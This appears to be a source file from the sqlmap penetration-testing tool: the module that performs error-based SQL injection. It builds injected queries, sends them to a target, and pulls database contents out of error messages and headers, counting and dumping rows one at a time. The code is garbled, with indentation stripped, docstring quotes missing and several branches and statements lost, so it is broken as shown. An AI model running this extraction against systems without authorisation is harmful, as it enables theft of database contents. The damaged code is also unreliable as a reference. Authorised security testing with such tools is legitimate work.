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#!/usr/bin/env python
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
import re
import time
from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.common import calculateDeltaSeconds
from lib.core.common import dataToSessionFile
from lib.core.common import dataToStdout
from lib.core.common import extractRegexResult
from lib.core.common import getUnicode
from lib.core.common import initTechnique
from lib.core.common import isNumPosStrValue
from lib.core.common import listToStrValue
from lib.core.common import randomInt
from lib.core.common import replaceNewlineTabs
from lib.core.common import safeStringFormat
from lib.core.convert import htmlunescape
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.settings import FROM_TABLE
from lib.core.settings import MYSQL_ERROR_CHUNK_LENGTH
from lib.core.threads import getCurrentThreadData
from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request
from lib.utils.resume import resume
reqCount = 0
def __oneShotErrorUse(expression, field):
global reqCount
threadData = getCurrentThreadData()
retVal = None
offset = 1
while True:
check = "%s(?P<result>.*?)%s" % (kb.misc.start, kb.misc.stop)
nulledCastedField = agent.nullAndCastField(field)
if Backend.getIdentifiedDbms() == DBMS.MYSQL:
nulledCastedField = queries[DBMS.MYSQL].substring.query % (nulledCastedField, offset, MYSQL_ERROR_CHUNK_LENGTH)
# Forge the error-based SQL injection request
vector = kb.injection.data[PAYLOAD.TECHNIQUE.ERROR].vector
query = agent.prefixQuery(vector)
query = agent.suffixQuery(query)
injExpression = expression.replace(field, nulledCastedField, 1)
injExpression = unescaper.unescape(injExpression)
injExpression = query.replace("[QUERY]", injExpression)
payload = agent.payload(newValue=injExpression)
# Perform the request
page, headers = Request.queryPage(payload, content=True)
reqCount += 1
# Parse the returned page to get the exact error-based
# sql injection output
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, listToStrValue(headers.headers \
if headers else None), re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, threadData.lastRedirectMsg[1] \
if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
if output:
output = getUnicode(output, kb.pageEncoding)
if isinstance(output, basestring):
output = htmlunescape(output).replace("<br>", "\n")
if Backend.getIdentifiedDbms() == DBMS.MYSQL:
if offset == 1:
retVal = output
retVal += output if output else ''
if not (output and len(output) == MYSQL_ERROR_CHUNK_LENGTH):
retVal = output
retVal = __errorReplaceChars(retVal)
dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(retVal)))
return retVal
def __errorFields(expression, expressionFields, expressionFieldsList, expected=None, num=None, resumeValue=True):
outputs = []
origExpr = None
for field in expressionFieldsList:
output = None
if field.startswith("ROWNUM "):
if isinstance(num, int):
origExpr = expression
expression = agent.limitQuery(num, expression, field, expressionFieldsList[0])
if "ROWNUM" in expressionFieldsList:
expressionReplaced = expression
expressionReplaced = expression.replace(expressionFields, field, 1)
if resumeValue:
output = resume(expressionReplaced, None)
if not output or (expected == EXPECTED.INT and not output.isdigit()):
if output:
warnMsg = "expected value type %s, resumed '%s', " % (expected, output)
warnMsg += "sqlmap is going to retrieve the value again"
output = __oneShotErrorUse(expressionReplaced, field)
if output is not None:
dataToStdout("[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), replaceNewlineTabs(output, stdout=True)))
if isinstance(num, int):
expression = origExpr
return outputs
def __errorReplaceChars(value):
Restores safely replaced characters
retVal = value
if value:
retVal = retVal.replace(kb.misc.space, " ").replace(kb.misc.dollar, "$")
return retVal
def errorUse(expression, expected=None, resumeValue=True, dump=False):
Retrieve the output of a SQL query taking advantage of the error-based
SQL injection vulnerability on the affected parameter.
global reqCount
count = None
start = time.time()
startLimit = 0
stopLimit = None
outputs = []
untilLimitChar = None
untilOrderChar = None
reqCount = 0
if resumeValue:
output = resume(expression, None)
output = None
if output and (expected is None or (expected == EXPECTED.INT and output.isdigit())):
return output
_, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression)
# We have to check if the SQL query might return multiple entries
# and in such case forge the SQL limiting the query output one
# entry per time
# NOTE: I assume that only queries that get data from a table can
# return multiple entries
if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in \
expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_TABLE) \
or (Backend.getIdentifiedDbms() in FROM_TABLE and not \
expression.upper().endswith(FROM_TABLE[Backend.getIdentifiedDbms()]))) \
and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) \
and not any(map(lambda x: x in expression.upper(), ["COUNT(*)", "EXISTS(", "MAX(", "MIN("])):
limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
topLimit = re.search("TOP\s+([\d]+)\s+", expression, re.I)
if limitRegExp or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
stopLimit = limitRegExp.group(int(limitGroupStop))
limitCond = int(stopLimit) > 1
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
if limitRegExp:
limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
stopLimit = limitRegExp.group(int(limitGroupStop))
limitCond = int(stopLimit) > 1
elif topLimit:
startLimit = 0
stopLimit = int(topLimit.group(1))
limitCond = int(stopLimit) > 1
elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
limitCond = False
limitCond = True
# I assume that only queries NOT containing a "LIMIT #, 1"
# (or similar depending on the back-end DBMS) can return
# multiple entries
if limitCond:
if limitRegExp:
stopLimit = int(stopLimit)
# From now on we need only the expression until the " LIMIT "
# (or similar, depending on the back-end DBMS) word
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
stopLimit += startLimit
untilLimitChar = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query)
expression = expression[:untilLimitChar]
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
stopLimit += startLimit
elif dump:
if conf.limitStart:
startLimit = conf.limitStart
if conf.limitStop:
stopLimit = conf.limitStop
# Count the number of SQL query entries output
countedExpression = expression.replace(expressionFields, "COUNT(*)", 1)
if re.search(" ORDER BY ", expression, re.I):
untilOrderChar = countedExpression.index(" ORDER BY ")
countedExpression = countedExpression[:untilOrderChar]
count = resume(countedExpression, None)
if not count or not count.isdigit():
_, _, _, _, _, _, countedExpressionFields, _ = agent.getFields(countedExpression)
count = __oneShotErrorUse(countedExpression, countedExpressionFields)
if (not count or (count.isdigit() and int(count) == 0)):
warnMsg = "it was not possible to count the number "
warnMsg += "of entries for the used SQL query. "
warnMsg += "sqlmap will assume that it returns only "
warnMsg += "one entry"
stopLimit = 1
elif isNumPosStrValue(count):
if isinstance(stopLimit, int) and stopLimit > 0:
stopLimit = min(int(count), int(stopLimit))
stopLimit = int(count)
infoMsg = "the SQL query used returns "
infoMsg += "%d entries" % stopLimit
for num in xrange(startLimit, stopLimit):
output = __errorFields(expression, expressionFields, expressionFieldsList, expected, num, resumeValue)
if output and isinstance(output, list) and len(output) == 1:
output = output[0]
except KeyboardInterrupt:
warnMsg = "Ctrl+C detected in dumping phase"
if not outputs:
outputs = __errorFields(expression, expressionFields, expressionFieldsList)
if outputs and isinstance(outputs, list) and len(outputs) == 1 and isinstance(outputs[0], basestring):
outputs = outputs[0]
duration = calculateDeltaSeconds(start)
debugMsg = "performed %d queries in %d seconds" % (reqCount, duration)
return outputs